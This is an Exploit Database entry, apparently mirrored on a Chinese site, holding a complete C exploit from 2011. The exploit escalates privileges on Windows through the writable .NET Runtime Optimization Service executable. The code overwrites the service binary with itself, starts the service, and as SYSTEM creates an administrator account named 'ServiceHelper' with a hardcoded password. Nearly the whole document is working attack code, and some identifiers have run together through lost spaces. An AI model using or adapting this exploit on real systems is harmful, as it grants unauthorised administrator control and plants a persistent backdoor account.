.NET Runtime Optimization Service – Local Privilege Escalation

• Exploit Database
• 12 阅读

• 作者： XenoMuta
  日期： 2011-03-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16940/

• /*
  # Exploit Title: .NET Runtime Optimization Service Privilege Escalation
  # Date: 03-07-2011
  # Author: XenoMuta <xenomuta@tuxfamily.org>
  # Version: v2.0.50727
  # Tested on: Windows XP (sp3), 2003 R2, 7
  # CVE : n/a
  
  ___ _______
   | |/ /__________/|//___/ /_____ _
   | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  / /__/ / / / /_/ / // / /_/ / /_/ /_/ /
   /_/|_\___/_/ /_/\____/_//_/\__,_/\__/\__,_/
  
   xenomuta [at] tuxfamily.org
   xenomuta [at] gmail.com
   http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
  
   This one's a no-brainer, plain simple:
  
   This service's EXE file can be overwritten by any non-admin domain user
   and local power users ( wich are the default permissions set ).
   This exploit compiles to a service that uses the original service's id.
  
   Tested on Windows 2003, WinXP (sp3) and Win7 
   ( my guess is that it runs on any win box running this service ).
  
   greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
   
   bless y'all!
  
  */
  #include <stdio.h>
  #include <windows.h>
  
  SERVICE_STATUSServiceStatus;
  SERVICE_STATUS_HANDLE hStatus;
  
  #define PWN_EXE "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
  #define PWN_SHORT "mscorsvw.exe"
  #define PWN_NAME".NET Runtime Optimization Service v2.0.50727_X86"
  #define PWN_ID"clr_optimization_v2.0.50727_32"
  
  voidServiceMain(int argc, char** argv) {
  if (InitService()) {
   ServiceStatus.dwCurrentState = SERVICE_STOPPED;
   ServiceStatus.dwWin32ExitCode = -1;
   SetServiceStatus(hStatus, &ServiceStatus);
   return;
  }
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;
   SetServiceStatus (hStatus, &ServiceStatus);
  }
  
  void ControlHandler(DWORD request);
  int InitService();
  
  int main(int argc, char **argv) {
  char acUserName[100];
  DWORD nUserName = sizeof(acUserName);
  GetUserName(acUserName, &nUserName);
  
  if (strcmp((char *)&acUserName, "SYSTEM")) {
  char *str = (char *)malloc(2048);
  memset(str, 0, 2048);
  snprintf(str, 2048, "%s.bak", PWN_EXE);
  if (rename(PWN_EXE, str) != 0) {
   fprintf(stderr, " :(sorry, can't write to file.\n");
   exit(1);
  }
  CopyFile(argv[0], PWN_EXE, !0);
  snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
  printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
  system(str);
  }
  
  SERVICE_TABLE_ENTRY ServiceTable[2];
  
  ServiceTable[0].lpServiceName = PWN_ID;
  ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
  
  ServiceTable[1].lpServiceName = NULL;
  ServiceTable[1].lpServiceProc = NULL;
  StartServiceCtrlDispatcher(ServiceTable);
  
  return 0;
  }
  
  int InitService() {
  system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
  }